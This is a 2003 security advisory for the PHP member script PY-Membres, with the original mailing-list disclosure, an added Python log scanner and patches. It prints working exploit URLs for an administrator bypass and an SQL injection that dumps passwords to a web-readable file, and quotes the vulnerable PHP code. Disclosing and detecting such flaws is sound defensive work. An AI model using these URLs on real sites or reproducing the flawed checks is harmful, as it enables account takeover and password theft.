SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:  Application (Forum/Board/Portal)  >  PY-Membres
Vendors:  Legendre, Pierre-Yves
PY-Membres Input Validation Flaw in 'pass_done.php' Permits SQL Injection
SecurityTracker Alert ID:  1007581
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Aug 26 2003
Impact:  Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 4.0, 4.1, 4.2
Description:  An input validation vulnerability was reported in PY-Membres in the 'pass_done.php' script. A remote user can execute SQL commands and obtain user passwords. A remote user can also gain administrative access.

Frog-m@n reported that a remote user can set the 'adminpy' variable when calling the 'admin/secure.php' script to be successfully authenticated as an administrator. A demonstration exploit URL is provided:

http://[target]/admin/admin.php?adminpy=1

Also, an input validation vulnerability in the 'pass_done.php' script lets a remote user inject SQL commands to be executed by the underlying SQL database. This flaw can be exploited if magic_quotes_gpc is set to 'OFF' in the 'php.ini' configuration file. A remote user can submit a specially crafted query to retrieve the password for any specified user on the application. A demonstration exploit URL is provided:

http://[target]/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt

The above listed exploit URL will cause passwords to be written to the 'file.txt' file in a web-accessible directory (from which the remote user can then retrieve the file).
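As an added illustration (not part of the advisory and not PY-Membres code), the following Python scans web-server access-log lines for the two request shapes the advisory describes: an 'adminpy' parameter supplied to a script under admin/, and SQL fragments such as INTO OUTFILE in the email parameter sent to pass_done.php. The log lines, client addresses, file path and finding tags are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (not from the advisory); the first two
# mirror the shapes of the demonstration URLs, the last two are benign traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Aug/2003:17:03:33 +0200] "GET /admin/admin.php?adminpy=1 HTTP/1.0" 200 512
203.0.113.7 - - [26/Aug/2003:17:04:01 +0200] "GET /pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/var/www/x.txt HTTP/1.0" 200 88
198.51.100.2 - - [26/Aug/2003:17:05:10 +0200] "GET /pass_done.php?Submit=1&email=alice%40example.org HTTP/1.0" 200 88
198.51.100.2 - - [26/Aug/2003:17:05:40 +0200] "GET /admin/index.php HTTP/1.0" 302 0
"""

# client, method, request-target and status from a common-log-format line
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')
# SQL fragments that have no business in an e-mail address parameter
SQLI_RE = re.compile(r"'\s*OR\b|\bINTO\s+OUTFILE\b|\bUNION\s+SELECT\b", re.IGNORECASE)


def classify(line):
    """Return finding tags for one log line (empty list if nothing suspicious)."""
    m = REQ_RE.match(line)
    if not m:
        return []
    _client, _method, target, _status = m.groups()
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded
    findings = []
    # Flaw 1: with register_globals, ?adminpy=... satisfies secure.php's broken check.
    if parts.path.startswith("/admin/") and "adminpy" in params:
        findings.append("adminpy-auth-bypass")
    # Flaw 2: SQL metacharacters in the email parameter handed to pass_done.php.
    if parts.path.endswith("/pass_done.php"):
        if any(SQLI_RE.search(v) for v in params.get("email", [])):
            findings.append("pass_done-sqli")
    return findings


def scan(log_text):
    """Map 1-based line numbers to their findings, for lines that have any."""
    results = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            results[n] = tags
    return results


if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG).items():
        print(n, tags)
```

Because parse_qs decodes percent-encoding, the patterns match the decoded values even though the raw log keeps the %20 sequences.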

Impact:  A remote user can gain administrative access to the application.

A remote user can execute SQL queries on the system. Using this method, a remote user can view the passwords for any user on the application.

Solution:  No solution was available at the time of this entry.

An unofficial patch is available at:

http://www.phpsecure.info/

Vendor URL:  www.scripts-php.com/index.php?page=script&pyid=3
Cause:  Access control error, Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Frog Man" <leseulfrog@hotmail.com>
Message History:   None.


 Source Message Contents

Date:  Tue, 26 Aug 2003 17:03:33 +0200
From:  "Frog Man" <leseulfrog@hotmail.com>
Subject:  [VulnWatch] [PHP] PY-Membres 4.2 : Admin Access, SQL Injection


Information:
°°°°°°°°°°°°°
Language: PHP
Version: 4.0, 4.1, 4.2 (and earlier?)
Website: http://www.scripts-php.com
Problems:
- Admin Access
- SQL Injection

PHP Code/Location:
°°°°°°°°°°°°°°°°°°°
admin/secure.php:

----------------------------------------------
<?php
// Flawed check: with register_globals, a request such as ?adminpy=1 defines
// $adminpy, so !isset($adminpy) is false and the whole && condition fails;
// the redirect never fires and the caller is treated as an administrator.
if (!isset($adminpy) && $adminpy !== "$admin")
{
Header("Location: index.php");
exit;
}
?>
----------------------------------------------

pass_done.php:

-----------------------------------------------------------------------------------------------------
[...]
if($Submit) connexiondb();
// $email comes straight from the request and is interpolated unescaped: with
// magic_quotes_gpc off, a quote in it ends the string literal and the rest is SQL.
$query = mysql_query("SELECT login, passwd FROM $db_table WHERE email='$email'");
list($login, $passwd) = mysql_fetch_row($query);
$nb=mysql_num_rows($query);
if($nb<1) {
echo"<script language=\"Javascript\">alert('Aucun membre ne correspond à votre e-mail !');window.location='pass_done.php';</script>";
exit;
}
[...]
-----------------------------------------------------------------------------------------------------

Exploits:
°°°°°°°°
http://[target]/admin/admin.php?adminpy=1
http://[target]/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt

Patch:
°°°°°°°
A patch and more details can be found on http://www.phpsecure.info.

In admin/secure.php, just replace the line:
----------------------------------------------
if (!isset($adminpy) && $adminpy !== "$admin")
----------------------------------------------
by:
----------------------------------------------
if (!isset($adminpy) || $adminpy !== "$admin")
----------------------------------------------

And in pass_done.php, add the line:
----------------------------
$email = addslashes($email);
----------------------------
just before:
---------------------------------------------------------------------------------
$query = mysql_query("SELECT login, passwd FROM $db_table WHERE email='$email'");
---------------------------------------------------------------------------------

frog-m@n


Copyright 2002, SecurityGlobal.net LLC